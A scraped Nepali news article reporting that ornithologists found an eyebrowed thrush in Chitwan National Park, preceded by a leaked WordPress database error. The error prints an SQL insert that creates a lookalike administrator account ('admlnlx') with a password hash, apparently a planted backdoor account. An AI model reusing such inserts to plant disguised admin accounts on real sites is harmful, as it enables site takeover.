WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLJnr9KAmMRJj2C.dh92qJCsSwcXTx.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 20:33:53', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर १७–
चराको प्रजातीहरुको बाक्लो बासस्थान रहेको चितवन राष्ट्रिय निकुञ्जमा नयाँ चरा फेला परेको छ ।
आयरल्याण्डबाट आएका चराविद र नेपालका चराविदको संयुक्त टोलीले गत बुधबार नयाँ चरा फेला पारेको हो । आइब्रो थस (गाजले चाँचरी चरा) नामका सो चरा खोरसोर हात्ती प्रजनन केन्द्रबाट एक किलोमिटर टाढा फेला परेको बर्ड एजुकेशन सोसाइटीका अध्यक्ष टेकबहादुर गुरुङले जानकारी दिनुभयो ।
समुद्र सतहबाट १५ सयदेखि तीन हजार मिटरसम्मको उचाइमा सो चरा पाइने चराविदहरु बताउँछन् । तर, चितवनमा पहिलोपटक १५ सय मिटरभन्दा तलको इचाइमा फेला परेको हो ।
सन् २०१५ को गणनाअनुसार नेपालमा ८८६ प्रजातिका चरा पाइन्छन् । त्यसमध्ये ६२५ प्रजातिका चरा चितवनमा छन् ।